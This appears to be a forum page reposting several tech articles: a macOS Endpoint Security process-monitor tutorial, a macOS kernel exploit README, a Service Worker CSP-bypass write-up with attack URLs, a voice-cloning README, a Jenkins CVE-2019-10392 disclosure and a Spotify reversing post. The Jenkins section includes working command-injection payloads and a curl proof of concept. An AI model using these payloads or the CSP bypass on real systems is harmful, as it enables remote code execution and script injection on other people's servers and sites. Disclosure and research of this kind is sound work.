Security client (es_client_t) for us to use. To compile the above code, link against the Endpoint Security Framework (libEndpointSecurity) Once we’ve created an instance of a es_new_client, we now must tell the Endpoint Security Subsystem what events we are interested in (or want to “subscribe to”, in Apple parlance). This is accomplished via the es_subscribe function (documented here and in the ESClient.h header file): $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESClient.h /** * Subscribe to some set of events * @param client The client that will be subscribing * @param events Array of es_event_type_t to subscribe to * @param event_count Count of es_event_type_t in `events` * @return es_return_t indicating success or error * @note Subscribing to new event types does not remove previous subscriptions */ OS_EXPORT API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos) es_return_t es_subscribe(es_client_t * _Nonnull client, es_event_type_t * _Nonnull events, uint32_t event_count); This function takes the initialized endpoint client (returned by the es_new_client function), an array of events of interest, and the size of said array: 1//(process) events of interest 2es_event_type_t events[] = { 3 ES_EVENT_TYPE_NOTIFY_EXEC, 4 ES_EVENT_TYPE_NOTIFY_FORK, 5 ES_EVENT_TYPE_NOTIFY_EXIT 6}; 7 8//subscribe to events 9if(ES_RETURN_SUCCESS != es_subscribe(endpointClient, events, 10 sizeof(events)/sizeof(events[0]))) 11{ 12 //err msg 13 NSLog(@"ERROR: es_subscribe() failed"); 14 15 //bail 16 goto bail; 17} The events of interest depends on well, what events are of interest to you! As we’re writing a process monitor we’re (only) interested in the following three process-related events: ES_EVENT_TYPE_NOTIFY_EXEC “A type that represents process execution notification events.” ES_EVENT_TYPE_NOTIFY_FORK “A type that represents process forking notification events.” ES_EVENT_TYPE_NOTIFY_EXIT “A type that represents process exit notification events.” For a full list of events that one may subscribe to, take a look at the es_event_type_t enum in the ESTypes.h header file: $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h /** * @brief The valid event types recognized by EndpointSecurity */ typedef enum { ES_EVENT_TYPE_AUTH_EXEC , ES_EVENT_TYPE_AUTH_OPEN , ES_EVENT_TYPE_AUTH_KEXTLOAD , ES_EVENT_TYPE_AUTH_MMAP , ES_EVENT_TYPE_AUTH_MPROTECT , ES_EVENT_TYPE_AUTH_MOUNT , ES_EVENT_TYPE_AUTH_RENAME , ES_EVENT_TYPE_AUTH_SIGNAL , ES_EVENT_TYPE_AUTH_UNLINK , ES_EVENT_TYPE_NOTIFY_EXEC , ES_EVENT_TYPE_NOTIFY_OPEN , ES_EVENT_TYPE_NOTIFY_FORK , ES_EVENT_TYPE_NOTIFY_CLOSE , ES_EVENT_TYPE_NOTIFY_CREATE , ES_EVENT_TYPE_NOTIFY_EXCHANGEDATA , ES_EVENT_TYPE_NOTIFY_EXIT , ES_EVENT_TYPE_NOTIFY_GET_TASK , ES_EVENT_TYPE_NOTIFY_KEXTLOAD , ES_EVENT_TYPE_NOTIFY_KEXTUNLOAD , ES_EVENT_TYPE_NOTIFY_LINK , ES_EVENT_TYPE_NOTIFY_MMAP , ES_EVENT_TYPE_NOTIFY_MPROTECT , ES_EVENT_TYPE_NOTIFY_MOUNT , ES_EVENT_TYPE_NOTIFY_UNMOUNT , ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN , ES_EVENT_TYPE_NOTIFY_RENAME , ES_EVENT_TYPE_NOTIFY_SETATTRLIST , ES_EVENT_TYPE_NOTIFY_SETEXTATTR , ES_EVENT_TYPE_NOTIFY_SETFLAGS , ES_EVENT_TYPE_NOTIFY_SETMODE , ES_EVENT_TYPE_NOTIFY_SETOWNER , ES_EVENT_TYPE_NOTIFY_SIGNAL , ES_EVENT_TYPE_NOTIFY_UNLINK , ES_EVENT_TYPE_NOTIFY_WRITE , ES_EVENT_TYPE_AUTH_FILE_PROVIDER_MATERIALIZE , ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_MATERIALIZE , ES_EVENT_TYPE_AUTH_FILE_PROVIDER_UPDATE , ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_UPDATE , ES_EVENT_TYPE_AUTH_READLINK , ES_EVENT_TYPE_NOTIFY_READLINK , ES_EVENT_TYPE_AUTH_TRUNCATE , ES_EVENT_TYPE_NOTIFY_TRUNCATE , ES_EVENT_TYPE_AUTH_LINK , ES_EVENT_TYPE_NOTIFY_LOOKUP , ES_EVENT_TYPE_LAST } es_event_type_t; Note there are two main event types: ES_EVENT_TYPE_AUTH_* and ES_EVENT_TYPE_NOTIFY_* ES_EVENT_TYPE_AUTH_* Events that require a response before being allowed to proceed. For example, the ES_EVENT_TYPE_AUTH_EXEC will block a process execution, until the subscriber (i.e. your security tool) provides a response. ES_EVENT_TYPE_NOTIFY_* Events that simply notify the subscriber (e.g. they do not require a response before being allowed to proceed). For example, the ES_EVENT_TYPE_NOTIFY_EXEC event simply notifies one that a process is (about to)execute. In our process monitor, we only utilize ES_EVENT_TYPE_NOTIFY_* events. These events are also succinctly described in Apple’s documentation for the es_event_type_t enumeration. Once the es_subscribe function successfully returns (ES_RETURN_SUCCESS), the Endpoint Security Subsystem will start delivering events. Event/Message Delivery We (just) discussed how to subscribe to events from the Endpoint Security Subsystem by invoking: es_new_client function es_subscribe function Of course, we’ll want add some logic/code process received messages. Recall that the final argument of the es_new_client function is a callback block (or handler). Apple states: “The handler block…will be run on all messages sent to this client.” The block is invoked with the endpoint client, and most importantly the message from the Endpoint Security Subsystem. This message variable is a pointer of type es_message_t (i.e. es_message_t*). Apple adequately “documents” the es_message_t structure in the (aptly named) ESMessage.h file, and also online. $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h /** * es_message_t is the top level datatype that encodes information sent from the ES subsystem to it's clients * Each security event being processed by the ES subsystem will be encoded in an es_message_t * A message can be an authorization request or a notification of an event that has already taken place * The action_type indicates if the action field is an auth or notify action * The event_type indicates which event struct is defined in the event union. */ typedef struct { uint32_t version; struct timespec time; uint64_t mach_time; uint64_t deadline; es_process_t * _Nullable process; uint8_t reserved[8]; es_action_type_t action_type; union { es_event_id_t auth; es_result_t notify; } action; es_event_type_t event_type; es_events_t event; uint64_t opaque[]; /* Opaque data that must not be accessed directly */ } es_message_t; Notable members of interest include: es_process_t * process A pointer to a structure that describes the process responsible for the event. es_event_type_t event_type The type of event (that will match one of the events we subscribed to, e.g. ES_EVENT_TYPE_NOTIFY_EXEC) event_type event An event specific structure (i.e. es_event_exec_t exec) Since we only subscribed to three events (ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_FORK, and ES_EVENT_TYPE_NOTIFY_EXIT) processes the received messages is fairly straight forward. For each of these three events, we are interested in extracting a pointer to a es_process_t which will hold the information about the process (starting, forking, or terminating). Recall the es_message_t structure received in the es_new_client callback contains a member: es_process_t * process (message->process). However, as noted this is the process responsible for the action, which might not always be the es_process_t * we’re actual interested in. Huh? In the case of a process exec (ES_EVENT_TYPE_NOTIFY_EXEC) event, the message->process will describe the process that is responsible for spawning the process. In other words, the parent. We are interested actually in the child, that is, the process that is about to be (or just was) spawned. For example, if we hop into a terminal and run the ls command the message->process points to the shell process (/bin/zsh). This of course is the parent - the process responsible for executing /bin/ls: (lldb) p message->process.executable.path (es_string_token_t) $17 = (length = 8, data = "/bin/zsh") So how do we ‘find’ the es_process_t * that points to the child process (/bin/ls)? Recall the message structure contains a member named event_type In the case of a process exec this will be set to ES_EVENT_TYPE_NOTIFY_EXEC and the message->event will point to a es_event_exec_t structure (defined in ESMessage.h😞 $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h typedef struct { es_process_t * _Nullable target; es_token_t args; uint8_t reserved[64]; } es_event_exec_t; The target member of this structure contains a pointer to the es_process_t we’re interested in (i.e. the one that described /bin/ls😞 (lldb) p message->event.exec.target->executable.path (es_string_token_t) $16 = (length = 7, data = "/bin/ls") What about the other two events we’ve subscribed to? For ES_EVENT_TYPE_NOTIFY_FORK events, the message contains an events of type es_event_fork_t, which contains information about the child process in es_process_t * child. For ES_EVENT_TYPE_NOTIFY_EXIT events, we can simply use message->process (as the process that’s generating the exit event, is the process we’re interested in …that is to say the process that’s about to exit). If you’re comfortable reading code, the following should now make sense: 1//process of interest 2es_process_t* process = NULL; 3 4// set type 5// extract (relevant) process object, etc 6switch (message->event_type) { 7 8//exec 9case ES_EVENT_TYPE_NOTIFY_EXEC: 10 process = message->event.exec.target; 11 break; 12 13//fork 14case ES_EVENT_TYPE_NOTIFY_FORK: 15 process = message->event.fork.child; 16 break; 17 18//exit 19case ES_EVENT_TYPE_NOTIFY_EXIT: 20 process = message->process; 21 break; 22} Now we (finally) have a pointer to the (relevant) es_process_t process structure. The definition for this structure can be found in the ESMessage.h header file: $ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h ... /** * @brief describes a process that took the action being described in an es_message_t * For exec events also describes the newly executing process * */ typedef struct { audit_token_t audit_token; pid_t ppid; pid_t original_ppid; pid_t group_id; pid_t session_id; uint32_t codesigning_flags; bool is_platform_binary; bool is_es_client; uint8_t cdhash[CS_CDHASH_LEN]; es_string_token_t signing_id; es_string_token_t team_id; es_file_t * _Nullable executable; } es_process_t; The es_process_t structure is also documented by Apple as part of it Endpoint Security Subsystem developer documentation: Let’s discuss various fields in the structure, as they’ll be relevant for the process monitor we’re building. First, we’re interested in extracting the process id (pid) from this structure. Though the es_process_t doesn’t directly contain a process pid, it does contain an audit token (type: audit_token_t). In the ESMessage.h header file, Apple states that: “values such as PID, UID, GID, etc. can be extraced from the audit token via API in libbsm.h.” Specifically, we can invoke the audit_token_to_pid (passing in the audit_token member of the es_process_t structure): 1//extract pid pid 2pid_t pid = audit_token_to_pid(process->audit_token); Of course, we’re also interested in the path to the process’s executable. This is found within the executable member of the es_process_t structure. The executable is pointer to a es_file_t structure: $ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h ... /** * es_file_t provides the inode/devno and path to a file that relates to a security event * the path may be truncated, which is indicated by the path_truncated flag. */ typedef struct { es_string_token_t path; bool path_truncated; union { dev_t devno; fsid_t fsid; }; ino64_t inode; } es_file_t; The path to the process’s executable is found in the path member of the es_file_t structure (&process->executable->path). Its type is es_string_token_t (defined in ESTypes.h😞 $ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h /** * @brief Structure for handling packed blobs of serialized data */ typedef struct { size_t length; const char * data; } es_string_token_t; We can convert this to a more “friendly” data type such as a NSString via the following code snippet: 1//convert to data, then to string 2NSString* string = [NSString stringWithUTF8String:[[NSData dataWithBytes:stringToken->data length:stringToken->length] bytes]]; If the process event is a ES_EVENT_TYPE_NOTIFY_EXEC, the process->event member points to a es_exec_env structure, which a contains the process’s arguments (es_event_exec_t->args😞 $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h ... /** * Arguments and environment variables are packed, use the following functions to operate on this field: * `es_exec_env`, `es_exec_arg`, `es_exec_env_count`, and `es_exec_arg_count` */ typedef struct { es_process_t * _Nullable target; es_token_t args; uint8_t reserved[64]; } es_event_exec_t; As noted in comments with the ESMessage.h header file, the arguments are packed. The following helper method (which utilizes the es_exec_arg_count and es_exec_arg) unpacks all arguments into an array: 1//extract/format args 2-(void)extractArgs:(es_events_t *)event 3{ 4 //number of args 5 uint32_t count = 0; 6 7 //argument 8 NSString* argument = nil; 9 10 //get # of args 11 count = es_exec_arg_count(&event->exec); 12 if(0 == count) 13 { 14 //bail 15 goto bail; 16 } 17 18 //extract all args 19 for(uint32_t i = 0; i < count; i++) 20 { 21 //current arg 22 es_string_token_t currentArg = {0}; 23 24 //extract current arg 25 currentArg = es_exec_arg(&event->exec, i); 26 27 //convert argument (es_string_token_t) to string 28 argument = convertStringToken(&currentArg); 29 if(nil != argument) 30 { 31 //append 32 [self.arguments addObject:argument]; 33 } 34 } 35 36bail: 37 38 return; 39} Once we’ve extracted the process’s identifier (pid), path, and arguments, all that’s left is the code signing information. This is pretty trivial, as such code signing information is directly embedded in the es_process_t structure: code signing flags: (uint32_t) process->codesigning_flags These are “standard” mcaOS code-signing flags, found in the cs_blobs.h file code signing id: (es_string_token_t) process->signing_id This is “the identifier used to sign the process.” team id: (es_string_token_t) process->team_id This is “the team identifier used to sign the process.” cdHash: (uint8_t array[CS_CDHASH_LEN]) process->cdhash This is “The code directory hash value” Below is some (well-commented) code that extracts and formats code-signing information from the es_process_t structure, into a (ns)dictionary: 1//extract/format signing info 2-(void)extractSigningInfo:(es_process_t *)process 3{ 4 //cd hash 5 NSMutableString* cdHash = nil; 6 7 //signing id 8 NSString* signingID = nil; 9 10 //team id 11 NSString* teamID = nil; 12 13 //alloc string for hash 14 cdHash = [NSMutableString string]; 15 16 //add flags 17 self.signingInfo[KEY_SIGNATURE_FLAGS] = 18 [NSNumber numberWithUnsignedInt:process->codesigning_flags]; 19 20 //convert/add signing id 21 signingID = convertStringToken(&process->signing_id); 22 if(nil != signingID) 23 { 24 //add 25 self.signingInfo[KEY_SIGNATURE_IDENTIFIER] = signingID; 26 } 27 28 //convert/add team id 29 teamID = convertStringToken(&process->team_id); 30 if(nil != teamID) 31 { 32 //add 33 self.signingInfo[KEY_SIGNATURE_TEAM_IDENTIFIER] = teamID; 34 } 35 36 //add platform binary 37 self.signingInfo[KEY_SIGNATURE_PLATFORM_BINARY] = 38 [NSNumber numberWithBool:process->is_platform_binary]; 39 40 //format cdhash 41 for(uint32_t i = 0; i<CS_CDHASH_LEN; i++) 42 { 43 //append 44 [cdHash appendFormat:@"%X", process->cdhash[i]]; 45 } 46 47 //add cdhash 48 self.signingInfo[KEY_SIGNATURE_CDHASH] = cdHash; 49 50 return; 51} Although we’re generally more interested in process creation events, we might want also want to track process termination events (ES_EVENT_TYPE_NOTIFY_EXIT). When a ES_EVENT_TYPE_NOTIFY_EXIT is delivered, message->event will point to a structure of type: es_event_exit_t: typedef struct { int stat; uint8_t reserved[64]; } es_event_exit_t; From this structure, we can extract the process’s exit code (via the stat member): //grab process's exit code int exitCode = message->event.exit.stat; Process Monitor Library As noted, many of Objective-See’s tools track process creations, and thus currently utilize my original process monitoring library; Proc Info. This library leverages Apple’s OpenBSM subsystem, in order to provide process events. As we previously discussed, there are several complexities and limitations of the OpenBSM subsystem (most notably process events from the subsystem do not include code-signing information). Lucky us, as shown in this blog, we can now leverage Apple’s Endpoint Security Subsystem to effectively and comprehensively monitor process events (from user-mode!). As such, today, I’m releasing an open-source process monitoring library, that implements everything we’ve discussed here today 🥳 On github: Process Monitoring Library It’s fairly simple to leverage this library in your own (non-commercial) tools: Build the library, libProcessMonitor.a Add the library and its header file (ProcessMonitor.h) to your project: #import "ProcessMonitor.h" As shown above, you’ll also have link against the libbsm (for audit_token_to_pid) and libEndpointSecurity libraries. Add the com.apple.developer.endpoint-security.client entitlement (to your project’s Info.plist file). Write some code to interface with the library! This final steps involves instantiating a ProcessMonitor object and invoking the start method (passing in a callback block that’s invoked on process events). Below is some sample code that implements this logic: 1//init monitor 2ProcessMonitor* procMon = [[ProcessMonitor alloc] init]; 3 4//define block 5// automatically invoked upon process events 6ProcessCallbackBlock block = ^(Process* process) 7{ 8 switch(process.event) 9 { 10 //exec 11 case ES_EVENT_TYPE_NOTIFY_EXEC: 12 NSLog(@"PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')"); 13 break; 14 15 //fork 16 case ES_EVENT_TYPE_NOTIFY_FORK: 17 NSLog(@"PROCESS FORK ('ES_EVENT_TYPE_NOTIFY_FORK')"); 18 break; 19 20 //exec 21 case ES_EVENT_TYPE_NOTIFY_EXIT: 22 NSLog(@"PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT')"); 23 break; 24 25 default: 26 break; 27 } 28 29 //print process info 30 NSLog(@"%@", process); 31 32}; 33 34//start monitoring 35// pass in block for events 36[procMon start:block]; 37 38//run loop 39// as don't want to exit 40[[NSRunLoop currentRunLoop] run]; Once the [procMon start:block]; method has been invoked, the Process Monitoring library will automatically invoke the callback (block), on process events, returning a Process object. The Process object is declared in the library’s header file; ProcessMonitor.h. This object contains information about the process (responsible for the event), including: pid path ancestors signing info …and more! Take a peek at the ProcessMonitor.h file for more details. Once compiled, we’re ready to start monitoring for process events! Here for example, we run ls -lart . # ./processMonitor ... PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC') pid: 7655 path: /bin/ls uid: 501 args: ( ls, "-lart", "." ) ancestors: ( 6818, 6817, 338, 1 ) signing info: { cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850; csFlags = 603996161; isPlatformBinary = 1 (true); signatureIdentifier = "com.apple.ls"; } PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT') pid: 7655 path: /bin/ls uid: 501 signing info: { cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850; csFlags = 603996161; isPlatformBinary = 1; signatureIdentifier = "com.apple.ls"; } exit code: 0 Once I receive the com.apple.developer.endpoint-security.client entitlement from Apple, I’ll release this pre-built binary (that links agains the “Process Monitor” framework)! Conclusion Previously, writing a (user-mode) process monitor for macOS was not a trivial task. Thanks to Apple’s new Endpoint Security Subsystem/Framework (on macOS 10.15+), it’s now a breeze! In short, one simply invokes the es_new_client & es_subscribe functions, to subscribe to events of interest (recalling that the com.apple.developer.endpoint-security.client entitlement is required). For a process monitor, we illustrated how to subscribe to the three process-related events: ES_EVENT_TYPE_NOTIFY_EXEC ES_EVENT_TYPE_NOTIFY_FORK ES_EVENT_TYPE_NOTIFY_EXIT We then showed how to extract the relevant es_process_t process structure and then parse out all relevant process meta-data such as process identifier, path, arguments, and code-signing information. Finally we discussed an open-source process monitoring library that implements everything we’ve discussed here today. 🥳 ❤️ Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page! Sursa: https://objective-see.com/blog/blog_0x47.html
  11. macOS-Kernel-Exploit DISCLAIMER You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for security researchers in a controlled lab environment. This exploit is intended for security research purposes only. General macOS Kernel Exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published ). Thanks to @LinusHenze for this cool bug and his support ;P. Writeup Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started: VM: Download the macOS installer from the appstore and drag the .app file into VMWare's NEW VM window Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb Have a look at the _kernel_trap function Build I recommend setting the bootargs to: debug=0x44 kcsuffix=development -v ⚠️Note: SMAP needs to be disabled on macs after 2015 (-pmap_smap_disable) You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit) Downloading Xcode 9.4.1 Commandline Tools should be enough Download: https://developer.apple.com/download/more/ make Execution ./exploit <KASLR slide> Tested on macOS Mojave: Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64 Demo: Sursa: https://github.com/A2nkF/macOS-Kernel-Exploit/
  12. Nonce-based CSP + Service Worker = CSP bypass? Service Worker is a great technology that allows you to develop web app's offline experience and increase performance of your website. But this also means that a web page is cached. And if your website has a nonce-based CSP, then your CSP will also be cached. This means, no matter how random the nonce is (and you serve different nonces for every request), as long as Service Worker sees that the request is same, it'll respond with cached content, which always have the same CSP nonce. To see if this can be exploited, I made a CSP bypass challenge. https://vuln.shhnjk.com/secure_sw.php#Guest Above page uses Strict CSP, and Service Worker code was taken from Google's SW intro page (second example you see when you click the link). So it should be safe against XSS bugs, right? Well, challenge was made in a way that it's possible to bypass Strict CSP, and I'm hoping that people will find this CSP bypass in real websites someday The challenge has 2 injection points. location.hash (Service Worker doesn't see the hash) Referrer passed to server (Service Worker doesn't see this either) There are many other sources of XSS that Service Worker doesn't use as a key for a request (e.g. Stored XSS payload can't be keyed either). Intended solution was following. https://attack.shhnjk.com/CSP_SW_bypass.html?%3Ciframe%20src=%27https://attack.shhnjk.com/get_nonce.html%27%20name=%27 Gareth wrote a great post about leaking information using <base> tag's target attribute even under Strict CSP. I used similar trick, which is iframe's name. I used referrer to inject iframe and name attribute leaked nonce of the legit script tag, and simply used a leaked nonce to execute script, through location.hash. This is possible because Service Worker doesn't care about changes in location.hash so it'll still serve cached content. On the other hand, @lbherrera_ solved the challenge using CSS. https://lbherrera.me/solver.html He used referrer to inject <input> tag and set nonce as a value, and then brute-forced nonce character one by one using CSS. When when brute-force identifies a character, it'll send a request to his server, which will set the cookie with a matched nonce character, and save whole nonce this way. After whole nonce is stolen, he would use the location.hash to perform XSS with proper nonce. Conclusion: Service Worker might help bypass nonce-based CSP Always fix XSS bugs even if XSS is blocked by CSP. Time to time, I find CSP bypass in the browser as well (e.g. this). All mitigations have bypasses Sursa: https://shhnjk.blogspot.com/2019/09/nonce-based-csp-service-worker-csp.html
  13. Real-Time Voice Cloning This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real-time. Feel free to check my thesis if you're curious or if you're looking for info I haven't documented yet (don't hesitate to make an issue for that too). Mostly I would recommend giving a quick look to the figures beyond the introduction. SV2TTS is a three-stage deep learning framework that allows to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices. Video demonstration (click the picture): Papers implemented URL Designation Title Implementation source 1806.04558 SV2TTS Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis This repo 1802.08435 WaveRNN (vocoder) Efficient Neural Audio Synthesis fatchord/WaveRNN 1712.05884 Tacotron 2 (synthesizer) Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions Rayhane-mamah/Tacotron-2 1710.10467 GE2E (encoder) Generalized End-To-End Loss for Speaker Verification This repo News 20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it. 06/07/19: Need to run within a docker container on a remote server? See here. 25/06/19: Experimental support for low-memory GPUs (~2gb) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM. Quick start Requirements You will need the following whether you plan to use the toolbox only or to retrain the models. Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib. Run pip install -r requirements.txt to install the necessary packages. Additionally you will need PyTorch (>=1.0.1). A GPU is mandatory, but you don't necessarily need a high tier GPU if you only want to use the toolbox. Pretrained models Download the latest here. Preliminary Before you download any dataset, you can begin by testing your configuration with: python demo_cli.py If all tests pass, you're good to go. Datasets For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100 where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox, see here. You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox. Toolbox You can then try the toolbox: python demo_toolbox.py -d <datasets_root> or python demo_toolbox.py depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue. Wiki How it all works (WIP - stub, you might be better off reading my thesis until it's done) Training models yourself Training with other data/languages (WIP - see here for now) TODO and planned features Contribution Feel free to open issues or PRs for any problem you may encounter, typos that you see or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute. Sursa: https://github.com/CorentinJ/Real-Time-Voice-Cloning
  14. Sep 12, 2019 CVE-2019-10392 — Yet Another 2k19 Authenticated Remote Command Execution in Jenkins Two weeks ago I saw on GitHub a nice repository about pentesting Jenkins. I downloaded the latest alpine LTS build from Docker Hub and I started to play with it, ending up finding an authenticated Remote Command Execution by having an user with the Job\Configure (USE_ITEM) privilege. 🐱‍👤 Discovery I launched a Jenkins instance locally with Docker using the following command: docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts-alpine In my case, the software versions are: Jenkins 2.176.3 Git Client Plugin 2.8.2 Git Plugin 3.12.0 I proceed through the initial configuration and created a non administrative user. After logging in as user test, we create a new job definition via the web user interface. If we select in the SCM section Git as our source, we are asked to insert a Git URL. Let’s fuzz it! 🤖 If we try common command injection payloads, we noticed that we can’t execute arbitary commands, but if we input the string -v as URL, we will receive the following output: Failed to connect to repository : Command "git ls-remote -h -v HEAD" returned status code 129: stdout: stderr: error: unknown switch `v' usage: git ls-remote [--heads] [--tags] [--refs] [--upload-pack=<exec>] [-q | --quiet] [--exit-code] [--get-url] [--symref] [<repository> [<refs>...]] -q, --quiet do not print remote URL --upload-pack <exec> path of git-upload-pack on the remote host -t, --tags limit to tags -h, --heads limit to heads --refs do not show peeled tags --get-url take url.<base>.insteadOf into account --sort <key> field name to sort on --exit-code exit with exit code 2 if no matching refs are found --symref show underlying ref in addition to the object pointed by it -o, --server-option <server-specific> option to transmit We have just discovered that command line switches are interpreted correctly by Git, thanks to the error: unknown switch `v' message. Can we do more than printing the Git usage? Let’s find it out! 🕵️ Exploitation I looked at man git-ls-remote in order to see the available command options and I noticed the --upload-pack=<exec> flag. By trying --upload-pack=id, I got: Failed to connect to repository : Command "git ls-remote -h --upload-pack=id HEAD" returned status code 128: stdout: stderr: id: ‘HEAD’: no such user fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. The command id HEAD was executed on the system! 🤹‍ We can control the full command being executed using the following payload: --upload-pack="`id`" Failed to connect to repository : Command "git ls-remote -h --upload-pack="`id`" HEAD" returned status code 128: stdout: stderr: "`id`" 'HEAD': line 1: uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins): not found fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. We successfully executed the id command in the context of the jenkins user! 💥 Proof of Concept First we need to retrieve the CSRF Token and then issue the request: get crumb curl 'http://localhost:8080/securityRealm/user/test/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'DNT: 1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://localhost:8080/' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'Cookie: <COOKIES>' --compressed send request curl 'http://localhost:8080/job/test/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl' -d "value=--upload-pack=`touch /tmp/iwantmore.pizza`" -H 'Cookie: <COOKIES>' -H 'Origin: http://localhost:8080' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'X-Prototype-Version: 1.7' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Jenkins-Crumb: <CRUMB>' -H 'Pragma: no-cache' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: text/javascript, text/html, application/xml, text/xml, */*' -H 'Cache-Control: no-cache' -H 'Referer: http://localhost:8080/job/test/configure' -H 'DNT: 1' --compressed Reporting I reported the issue to the Jenkins JIRA and in less than one week the vulnerability was confirmed to be fixed in the staging environment. Props to the Jenkins team for how they managed the responsible disclosure process, in particular to Daniel Beck and Mark Waite. 👏 Timeline 2019-09-03: vulnerability discovered 2019-09-03: vulnerability reported 2019-09-04: first response by the vendor 2019-09-04: vulnerability acknowledged 2019-09-07: fix available 2019-09-08: fix confirmed 2019-09-08: CVE-2019-10392 was issued 2019-09-11: pre announcement 2019-09-12: @TheHackersNews tweet 2019-09-12: fix released and public announcement Sursa: https://iwantmore.pizza/posts/cve-2019-10392.html
  15. Skiptracing: Automated Hook Resolution Sam Lerner Sep 17 · 11 min read This post is the third part of my series about tracking skips in the Spotify client. This post is a direct continuation of my work on the MacOS client first detailed here: https://medium.com/@lerner98/skiptracing-reversing-spotify-app-3a6df367287d. Hardcoding Addresses In the previous article, I hooked the target functions using HookCase to track when the skip subprocedure was called. However, there was one big problem with this approach that I didn’t realize at the time. One day, I decided to see how many skipped songs I have logged. It seemed low. I then decided to skip a few songs and again print out the number of songs. It didn’t change. Dammit! Something broke and I have no clue what. Finding the Problem Let’s crack open Spotify in IDA and go to our hook addresses as a sanity check. In the previous article, I made a big deal about finding sub_100CC2E20 so let’s go there and see what could’ve gone wrong: This doesn’t look anything like our next procedure. In fact, 0x100CC2E20 isn’t even on an instruction boundary. This is a big problem. Going back to the mediaKeyTap method, we find a familiar-looking CFG: However, there is one big (highlighted) difference. The address of our called procedure has changed from 0x10006FE10 to 0x100069CF0, a difference of -24864 bytes. Now going to our function with the big switch statement: We see that is now located at 0x100067E40 when it was located at 0x10006DE40 previously: a difference of -24576. The closeness of these offsets gives us a clue to what is going on. My theory is that Spotify occasionally updates itself and on this particular update (or set of updates), around 24000 bytes were removed before our target procedures and a couple hundred were added in between them. This presents us with a conundrum: how do we find the correct addresses to hook when they could change between runs? The answer is Objective-C. Objective-C Objective-C is at heart a dynamic language. You can add methods to a class, change a method’s implementation, and do all sorts of fuckery at runtime. To support this behavior, the class information must be stored in the application binary somewhere. If you run objdump -h on the Spotify binary, you’ll see the following interesting sections: namely the sections that begin with __objc. The first section we’ll want to take a look at is the __objc_classlist section. While undocumented, this section contains an array of pointers into the __objc_data section where each pointer points to an objc_class struct. We will discuss the layout of the struct later. Our end goal will be to find the addresses of the unnamed next and previous subprocedures, but our bridge to these addresses will be mediaKeyTap method because we can always find it with the help of the Objective-C class data. Resolving Objective-C Methods The class that responds 